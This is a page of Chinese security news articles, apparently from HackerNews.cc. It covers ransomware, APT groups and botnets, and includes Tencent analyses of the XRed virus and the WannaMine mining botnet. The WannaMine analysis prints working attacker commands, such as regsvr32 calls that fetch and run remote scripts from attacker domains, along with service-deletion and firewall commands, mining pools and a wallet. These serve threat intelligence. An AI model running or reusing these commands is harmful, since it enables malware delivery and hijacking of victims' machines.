标签: 黑客入侵

美国拉辛市遭勒索软件攻击 多行业网络受影响

1月31日,美国威斯康星州的拉辛市被勒索软件入侵,事件发生后,该市大部分计算机系统瘫痪。 该地政府科技网站发布报告称:本市的计算机网络系统周五被勒索软件入侵,至周日下午网络系统仍处于瘫痪状态。目前,该市的网站、电子邮件以及在线支付系统都收到影响。拉辛警方发布Facebook,称其目前无法支付事件的处理费用,也无法提供事件的侦测报告。 周五,该市的信息管理部门开启了事件响应程序,地方当局以及联邦政府对事件展开调查,调查声称税收以及911公共安全系统未受这次勒索软件入侵影响。 鲍威尔在一份声明中称:MIS worked over the weekend 公司联合网络安全公司制作了一个周密的计划,在不传播勒索软件的情况下恢复网络系统,目前对事件发生原因以及波及范围都在进行调查。 去年12月,Maze勒索软件运营商发布消息,称其利用勒索软件盗取彭萨科拉市的2GB文件。 去年11月,路易斯安那周政府遭到勒索软件攻击,多州的服务机构包括机动车管理局、卫生部以及运输发展部都受到影响。这一事件使得路易斯安那州关闭了该州的几个网站以及邮件和互联网服务。 8月份,近23个地方政府遭受勒索软件攻击,佛罗里达州的一些城市也受到黑客影响。去年6月,佛罗里达州被勒索软件攻击系统,里维埃拉海滩城同意支付60万美元的赎金来解密其数据。几天后,莱克城也同意支付近50万美元的赎金机密遭勒索软件攻击系统。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

节日期间某企业远程办公遭遇 XRed 病毒攻击

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/880.html 腾讯企业安全应急响应中心(下称腾讯安全)接到某互联网公司求助,该公司一位业务主管分享到内部工作群的远程办公工具及电子表格文件被发现感染病毒,导致部门200多名员工电脑被感染,该公司担心系统业务安全受到威胁。 一、概述 受疫情影响,多个省市延长春节假期,一些企事业单位、互联网公司或推迟开工日期,或全员进行远程办公,一部分员工使用个人电脑临时替代工作电脑,增加了企业被感染的风险。 近日,腾讯企业安全应急响应中心(下称腾讯安全)接到某互联网公司求助,该公司一位业务主管分享到内部工作群的远程办公工具及电子表格文件被发现感染病毒,导致部门200多名员工电脑被感染,该公司担心系统业务安全受到威胁,希望腾讯安全协助处理。 接到求助后,腾讯安全工程师和该公司密切配合,快速梳理了相关信息,通过溯源发现是该企业在进行远程办公时,某位业务主管使用个人电脑办公,该电脑被XRed病毒感染,致使电脑EXE文件及电子表格文件均被病毒感染,通过内部工作群分享远程办公工具之后,造成该病毒在同事间扩散。 通过分析,腾讯安全专家发现XRed病毒是具备远程控制、信息窃取能力的感染型病毒,可以感染本地EXE文件及xlsx电子表格文件,病毒可通过文件分享和U盘、移动硬盘等媒介传播。 该企业因发现比较及时,使用腾讯电脑管家或腾讯T-sec终端安全管理系统清除病毒后,已完美恢复被感染的文件,本次病毒攻击未对该企业造成重大影响。 二、病毒感染源排查 1.该公司前期内部排查:公司网管注意到某员工通过内部工作群分享的压缩包中远程办公工具exe文件被感染,而公司统一提供的远程办公工具exe则为正常文件。因此基本确认病毒传播源头。 2.腾讯安全工程师对此进行了远程排查,发现怀疑感染病毒的电脑有如下现象: (1)在该电脑上解压文件,发现解压出来的exe文件对比原始文件大,已被感染 (2)任意复制一个exe文件放到桌面上,exe文件都会被感染,感染后文件描述被修改成触摸板设备驱动程序,据此可以基本确认该病毒为同行已披露过的“Synaptics”蠕虫病毒。 (3)继续检查发现,这台中毒电脑上破解版压缩软件并未发现“供应链污染”类问题。基本可以确认是这台个人电脑更早前某个时刻感染XRed病毒,在本次应急用作工作电脑远程办公使用,对外分享文件时,被该公司IT人员监测发现异常。 三、阻断病毒传播和修复方案 该公司IT人员立即对感染病毒的机器进行断网处理,避免进一步扩散。 在确认电脑管家云主防可以拦截病原体“Synaptics.exe”之后,立即要求未安装“腾讯T-sec终端安全管理系统”的电脑安装腾讯电脑管家。病原体“Synaptics.exe”有超过2万个变种,最近一次更新是2020年1月,目前仍处于活跃状态,建议企业及时升级杀毒软件,做好防范。 对已感染病毒对电脑,使用腾讯电脑管家(或腾讯T-sec终端安全管理系统)进行全盘查杀修复被感染的文件。XRed病毒感染方式相对比较特殊(详情可参见后续“样本详细分析”部分),腾讯电脑管家可以准确识别和完美修复,将被感染文件还原成原始状态。 四、样本详细分析 根据该病毒在写入的日志信息以及Gmail用户名的关键词,将该感染型病毒名确定为“XRed”。XRed病毒最近四个月较为活跃,有一定增长态势。 该病毒通过感染指定位置的32位的“.exe”后缀文件与“.xlsx”后缀文件,使其恶意代码可以通过文件共享大量传播但不会导致系统明显卡顿。 如下三个指定的感染位置: %USERPROFILE%\Desktop %USERPROFILE%\Documents %USERPROFILE%\Downloads 被感染的文件被执行时,会执行恶意逻辑,包括释放伪装名为“Synaptics.exe”的文件常驻系统,进行远程控制,回传窃取的敏感信息等恶意行为。 主要功能逻辑如下图所示: 被感染的可执行文件体积增量约为753KB,包含一个名为“EXERESX”的资源,该资源是原始正常的程序。被感染的文件资源如下图所示。 EXERESX”资源会在宿主文件运行时被释放到当前目录并设置隐藏属性后执行。添加“ ._cache_”前缀拼接文件名,如下图所示。 该病毒释放并加载名为“KBHKS”的动态库资源,通过设置相关钩子消息以记录键盘输入信息及其窗口信息等, Hook代码关键逻辑如下: 病毒使用“XLSM”资源感染xlsx后缀文件,并将“.xlsx”后缀改为“.xlsm”。修改office组件设置以及xlsm后缀目的为了能够自动静默启用宏。 “XLSM”资源包含了恶意VBA脚本,恶意功能如下: 篡改Word和Excel组件的宏设置,启用所有宏。 通过公有云盘下载并执行Synaptics.exe病毒。 键盘记录特殊虚拟键码转换如下图所示 用于回传敏感信息的邮箱账密、配置与病毒本体的更新链接等硬编码配置如下图所示: 具有基础的远程控制功能,包括执行CMD命令、屏幕截图、打印目录、下载文件、删除文件等。功能代码如下图所示: 远控功能 IOCs: md5 13358cfb6040fd4b2dba262f209464de C2 & URL xred.mooo.com freedns.afraid.org/api/?action=getdyndns&sha=a30fa9*****797bcc613562978 hxxps://docs.google.com/uc?id=0BxsM*****aHFYVkQxeFk&export=download hxxps://www.dropbox.com/s/zh*****hwylq/Synaptics.rar?dl=1 hxxp://xred.site50.net/syn/*****.rar 病毒作者邮箱地址 xredline1@gmail.com xredline2@gmail.com xredline3@gmail.com 参考资料: https://www.freebuf.com/articles/terminal/222991.html

微软警告 TA505组织正在改变网络攻击策略

微软安全专家发现TA505网络犯罪团伙正在发起网络钓鱼活动,使用带有HTML重定向器附件发送恶意Excel文档。据悉,这是TA505团伙首次采用这种策略。 TA505黑客团伙自2014年以来一直活跃于零售和银行业。该团伙以一些规避技术而闻名,随着时间推移这些技术被用于安全规避控制,主要是通过几种恶意软件渗透到公司内部,如滥用所谓的LOLBins,使得受害者在合法情况下滥用程序。此外,TA505集团还与Locky、BitPaymer、费城、globeimparter和Jaff勒索软件家族一起参加了旨在分发Dridex banking特洛伊木马的活动。 网络安全公司Eversion的安全专家发表报告称:TA505已经危害了1000多个组织。 “我们在对这场运动的分析过程中,我们能确定至少一家总部位于美国的电气公司、一家美国州政府网络以及世界上最大的25家显示出妥协迹象的银行都包含其中。” 目前,微软通过发布推特证实这项网络钓鱼活动。 “这是第一次使用HTML重定向器观察Dudear ,其中,攻击者还使用不同语言的HTML文件。值得注意的是,他们还使用IP回溯服务来跟踪下载恶意Excel文件的固定IP地址。” 此外,微软专家还透露,攻击者正在使用电子邮件上附带的的HTML定向程序。一旦受害者打开邮件,HTML就会定向下载一个恶意的Excel文件,而该文件最终将丢弃有效载荷,攻击者可以使用IP回溯服务跟踪下载恶意Excel文件的计算机的IP地址。这是TA505第一次使用这种技术,过去,该组织使用携带恶意软件的垃圾邮件或者使用恶意的url来作为附件,在受害者被诱骗打开Excel文档后,不可以使用在线预览,但可进行文档编辑。 目前有好消息称:微软安全情报部门已经确认微软威胁防护系统能够中和攻击,office 365能够检测此活动中使用的恶意附件和URL,microsoft defender atp也能够检测TA 505使用的恶意html、excel文件和有效负载。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

伊朗 19 岁黑客攻破美一退休牙医网站以示对美国的不满

据外媒报道,Phil Openshaw是美国加州一名退休的牙医,他已经好几个月没上过自己的网站了,所以他并不知道它不再显示其每年会在乌干达提供免费牙科服务的细节信息。相反,该网站现在展示了一张最近遭暗杀的伊朗将军Qassem Soleimani的照片,并且上面还写着“打倒美国”的标语。 当他告知这一情况之后,Openshwa表示:“我真的不知道如何应对。我将会去看看。” 攻击Openshaw网站的黑客自称Behzad先生,并透露自己是一名19岁的爱国主义者。“我不为政府工作。我为我的祖国伊朗工作。”另外他还称自己是在工作编程中学到如何攻破网站的。“我们想要知道,如果他们伤害了我们的人民或我们的国家我们是不会倒下的。”   (稿源:cnBeta,封面源自网络。)

挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点: 利用“永恒之蓝”漏洞攻击传播; 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动; 通过添加IP策略阻止本机连接对手木马的47个矿池,阻止其他病毒通过“永恒之蓝”漏洞入侵; 添加计划任务,WMI事件消费者进行持久化攻击,删除“MyKings”病毒的WMI后门; 利用COM组件注册程序regsvr32执行恶意脚本; 利用WMIClass存取恶意代码; 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’, ‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令: regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段JScript脚本,功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下: 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化: 旧版: 备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址:172.247.116.8 默认端口:8000 核心Powershell:in6.ps1,in3.ps1 新版: 备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址:skt.xiaojiji.nl 默认端口:80 核心Powershell:network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行 http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1 RunDDOS(Gh0st远控木马) Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。 分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见,技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam.txt下载二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务: sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性: attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP网络连接,从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。 然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下: DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。 使用以下矿池: xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包: 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点,我们建议企业采取以下措施加以防范: 使用安全的密码策略,切勿使用弱口令; 及时修复Windows系统漏洞,推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞,亦可参考以下链接重点修复永恒之蓝相关漏洞;(1)MS17-010永恒之蓝漏洞补丁下载地址:(2)XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598(3)Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的指定IP连接登陆; 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器; 当系统出现异常时,检查计划任务和WMI(可用WMITools.exe)中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接: WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃,14万台linux系统受攻击

微软成功清理与朝鲜黑客攻击有关的 50 个域名

外媒报道称,微软刚刚清理了由朝鲜网络黑客组织 APT37 运营的 50 个域名。软件巨头称,这些域名一直被 Thallium(亦称作 PT37)组织用于发动网络攻击。通过持续数月的关注、监视和追踪,该公司数字犯罪部门(DCU)和威胁情报中心(MSTIC)团队得以厘清 Thallium 的基础架构。 12 月 18 日,总部位于雷德蒙德的微软,在弗吉尼亚法院向 Thallium 发起了诉讼。圣诞节过后不久,美当局即批准了法院命令,允许该公司接管被朝鲜黑客用于攻击目的的 50 多个域名。 此前,这些域名常被用于发送网络钓鱼电子邮件和网站页面。黑客会诱使受害者登陆特制的站点,窃取凭证,从而获得对内部网络的访问权限,并执行后续针对内网的升级攻击。 微软表示,除了追踪该组织的网络攻击,该公司还调查了被感染的主机。微软企业客户副总裁 Tom Burt 表示: “攻击主要集中在美、日、韩三国的目标,受害者包括了政府雇员、智囊团、高校工作人员、平权组织成员、以及普通人”。 在诸多案例中,黑客的最终目标是感染受害机器,并引入 KimJongRAT 和 BabyShark 两个远程访问木马(RAT)。 Tom Burt 补充道:“一旦将恶意软件安装在受害者计算机删,它就会从中窃取信息,保持潜伏并等待进一步的指示”。 当然,这并不是微软首次通过法院命令来阻断有外国背景的黑客组织的运作。 此前,微软曾对有俄方背景的 Strontium(又名 APT28 或 Fancy Bear)黑客组织发起过 12 次行动(上一次是 2018 年 8 月)、并成功撤下了 84 个域名。 以及通过法院命令接管了与伊朗有关的网络间谍组织 Phosphorus(APT35)运营的 99 个域名。   (稿源:cnBeta,封面源自网络。)

新发现!FIN7 的新型装载程序应用在 Carbanak 后门

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序,该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现,被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃,活动目标是窃取全球范围内的企业支付卡信息,目前疑似已经袭击了100多家美国公司,袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月,臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉,并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外,BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看,BOOSTWRITE也是一个与FIN7组织相关联的加载程序,它也能够将恶意软件直接放入内存,但BIOLOAD通过二进制植入技术,采用dll的劫持方法,将恶意代码加载到合法程序中。 在研究过程中,Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库,这个链接库从windows 10 1803中开始清理安装Windows OS.此外,研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看,BIOLOAD装载机样本于分别2019年3月和7月进行了编制,而BOOSTWRITE样本于5月编制。在加载器上,BIOLOAD不支持多个有效载荷,而使用XOR来解密有效载荷,并不是ChaCha密码。在秘钥连接上,BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示,BIOLOAD加载器主要被用来进行程序攻击,并进行Carbank病毒传输。专家发现,这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明:BIOLOAD是由FIN7网络犯罪集团开发的,很可能是BOOSTWRITE的前身。 Fortinet因此得出结论:“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件,Fin7拥有最新工具的共享代码库,以及同样的技术和后门,导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议:由于加载程序是专门为每台目标计算机构建的,需要管理权限才能部署,因此建议相关部门要注意收集有关目标网络的信息。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

全新 Mozi P2P 僵尸网络入侵 Netgear、D-Link、Huawei 路由器

由于被一个名为Mozi的P2P僵尸网络入侵,Netgear、D-Link和Huawei路由器正积极检测Telnet弱密码。因该僵尸网络再次使用了部分代码,可判定该事件与 Gafgyt恶意软件相关。 360 Netlab的安全研究人员在发现该僵尸网络后,对其进行了为期四个月的监控,发现该僵尸网络主要目的是用于DDoS网络攻击。攻击行动首先会在torrent客户端和其他P2P端存储节点信息,然后通过DHT协议进行网络扩散。而这样的扩散行为会使得在无需服务器情况下建立的僵尸网络传播速度更快,也会导致大量僵尸网络在DHT协议中巧妙藏身,更难被检测。 此外,Mozi还使用了ECDSA384和XOR算法来保证僵尸网络组件和P2P网络的完整性和安全性。 恶意软件使用telnet并利用漏洞向新的易受攻击的设备进行传播,该行为主要通过登录加密性弱的路由器或CCTV DVR来实现,在成功利用未修复的主机后立刻执行负载。而恶意软件一旦载入受攻击设备,新激活的bot将自动加入Mozi P2P成为受攻击的新节点。在受感染后,新的网络节点将接收并执行僵尸网络主机的命令,此时Netgear、D-Link和华为路由器也会收到影响。 针对此现象,研究人员做出解释:Mozi在通过DHT协议建立p2p网络后,配置的网络设备会同步更新,相应的任务也会根据配置文件中的指令即刻启动。 以下是自360 Netlab研究人员自2003年9月监测Mozi以来发现的10个受感染的P2P未修补设备: 像Nugache、Storm(又名Peacomm)、Sality P2P、Waledac、Kelihos(又名Hlux)、ZeroAccess(又名Sirefefef)、Miner和Zeus这样的P2P僵尸网络从2006年初开始,就为他们的主人组建了庞大的僵尸网络系统,但现在大部分已经灭绝,而另一些设备如Hajime 、Hide’N Seek(简称HNS),他们仍在寻找易受攻击的设备。 2018年9月,Hide’N Seek在短短几天内感染9万多台设备,而Hajime自2016年秋季首次被发现以来,在短短6个月内,感染约30万台设备。 众所周知P2P僵尸网络对打击他们的下沉式攻击具有很强的弹性,但也不乏一些例子证明ZeroAccess和Kelihos是易受攻击的。 在更多关于Mozi的相关信息被检测出来之前,关于对它进行深层次攻击可能性的猜测从未间断。但可以肯定的是,在此项检测之前,若相关目标还未被修补,Mozi对信息的搜集扩散范围会越来越大。 除上述僵尸网络外,另一个名为Roboto的P2P僵尸网络在8月下旬被被同一个研究小组发现,该网络在互联网上还会对未修补Webmin安装的Linux服务器进行扫描,而有关这个新的P2P僵尸网络更多信息可在360 Netlab的Mozi报告末尾了解。   消息来源:bleepingcomputer, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链

黑客攻破美一女孩房间安全摄像头并称自己是圣诞老人

据外媒报道,有人黑进了美国密西西比一户人家的环形安全摄像头,并且还用扬声器骚扰这家的8岁女孩。这名黑客告诉她自己是圣诞老人并还怂恿她破坏房间。这是近期发生的几起黑客在用户不知情的情况下登陆其Ring账号的攻击事件之一。 Ashley LeMay近日告诉媒体,她在自己女儿房间里安装了摄像头,这样她就可以在上夜班时照看她们。“在我买到它们之前做了很多研究。你知道,我真的觉得它是安全的。” 然而这次入侵就发生在她安装这款摄像头四天后,当时她正在出差,她的丈夫在家带孩子。 当她的女儿Alyssa听到自己卧室传出来声音后于是走进去看看究竟是什么。 从当事人分享的视频可以看到,Alyssa非常紧张地站在自己的房间里,黑客则远程播放了来自恐怖片《潜伏》里的歌曲《Tiptoe through the Tulips》。 “谁在那里,”Alyssa问道。 “我是你最好的朋友。我是圣诞老人。我是圣诞老人。难道你不想成为我最好的朋友吗?”黑客说道。 之后,这个匿名黑客继续骚扰Alyssa、嘲笑她并怂恿她破坏房间。 对此,这款摄像头厂商Ring在提供给媒体的声明中指出,黑客并不是通过数据泄露或破坏Ring的安全获取信息的,相反,这个人可能利用了这户人家账户的安全性。 根据声明,Ring用户经常会使用相同的用户名和密码来注册不同账户和订阅服务。“作为预防措施,我们强烈并公开鼓励所有Ring用户在其Ring账户上启用双重认证、添加共享用户(而不是共享登录凭证)、使用高安全性密码并定期更换密码。” Ashley表示,她还没有在她的设备上设置双重认证。   (稿源:cnBeta,封面源自网络。)

微软警告 GALLIUM 黑客组织瞄准全球电信供应商

微软专家指出:GALLIUM黑客组织利用未修补的漏洞运行/JBoss应用服务器系统。 “目前微软威胁情报中心(MSTIC)在对GALLIUM黑客组织行为逐步了解中发现,其目标是电信供应商,为了破坏其目标网络,GALLIUM利用WildFly/JBoss中的公开漏洞对未修复的网络服务进行攻击。” GALLIUM 的行为表现活跃,尤其是2018年至2019年间格外明显。而攻击者一旦破坏了目标网络,他们将会使用常见的科技手段如Mimikatz来窃取可用的凭证。 专家指出,目前GALLIUM 正在使用一些版本常见的软件以及公开化的一些工具,这工具只需稍作改动,就可以逃避检测。运营商利用低成本和易于替换的基础设施,使用动态DNS域和定期重用的跃点。 MSTIC分析指出:使用动态DNS提供商而不是符合条件的注册域名,GALLIUM的低成本、低投入成为运营趋势。 在中国大陆、中国香港和中国台湾的基础设施中,且已观察到GALLIUM基础设施建设。 威胁行为很大程度上依赖于网络shell,通过此shell获得持久网络稳定,然后进行恶意软件传输。在这个阶段中,恶意软件的有效负载将会被舍弃,且不会通过稳定网络进行程序安装。 除了标准的 China Chopper外,该公司还为微软IIS服务器运行使用了一个名为blackmold的原生web shell。Blackmold能够找到出本地驱动器,并进行基本的文件操作如查找、读取、写入、删除和复制,设置文件属性,渗透文件,并使用参数运行cmd.exe。 该黑客组织还会提供个性化的Gh0st RAT和Poison Ivy服务版本,这两个版本都会修改软件使用通信方法。黑客还将QuarkBandit作为第二级恶意软件,专家称该软件具有修改配置选项和加密的Gh0st RAT变体。日前,研究人员还通过观察发现 GALLIUM使用VPN来进行网络持久的访问。 针对此问题,微软在报告中还公布了一份IOC指标列表。   消息来源:SecurityAffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接